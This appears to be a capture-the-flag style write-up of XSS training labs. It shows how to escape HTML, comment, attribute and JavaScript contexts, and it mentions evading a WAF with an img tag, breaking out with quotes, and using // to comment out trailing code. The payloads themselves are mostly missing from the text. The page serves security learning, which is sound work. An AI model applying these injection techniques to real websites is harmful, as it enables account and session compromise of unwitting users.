XSS Survival Guide Labs
Labs from XSSRats
HTML simple context
Lab 10
Step 1: Enter some gibberish into the input field and check where it is reflected on the page.
Step 2: Check whether you can escape the HTML context
Inserting a non existing tag will prevent to be blocked by filtering
The image below shows that we could successfully escape the context and insert HTML tags into the page.
Step 3: Crafting an XSS payload
Now that we have successfully escaped the context, we could try to craft a payload that will fire an XSS.
The <script></script>
tag seemed to be blocked by the WAF, but using the <img/>
tag, we were able to fire a XSS.
HTML comments context
Lab 20
Step 1: Enter a canary in the input field and identify where it is reflected on the page
From the image below we can observe that our canary get reflected in an HTML comment.
Step 2: Break out of the context
This payload was used to break out of the context.
Step 3: Create an appropriate payload
This payload was used to fire a XSS.
HTML tag attribute context
Lab 30
Step 1: As usual, we could insert a canary and look where the canary get reflected in the source code.
The image below shows that the input canary get reflected into the value
tag.
Step 2: Escaping the value tag context
We tried several payloads to escape the context.
The following payloads did not work.
However, we could escape the context with a single quote ('
).
When trying to escape an HTML context, think of trying single ('
) and double ("
) quote
Step 3: Craft an appropriate payload
The appropriate payload that allow us to fire an XSS was:
Javascript context
Lab 40
Step 1: Identify where our input get reflected
In this lab, the input get reflected within a Javascript function.
Step 2: Break out of the context and fire an XSS
To break out of the context, we inserted the following payload.
Since we are already in a Javascript context, we did not have to add <script>
tag to fire an XSS. The //
here was used to comment the rest of JS code following our payload.
Last updated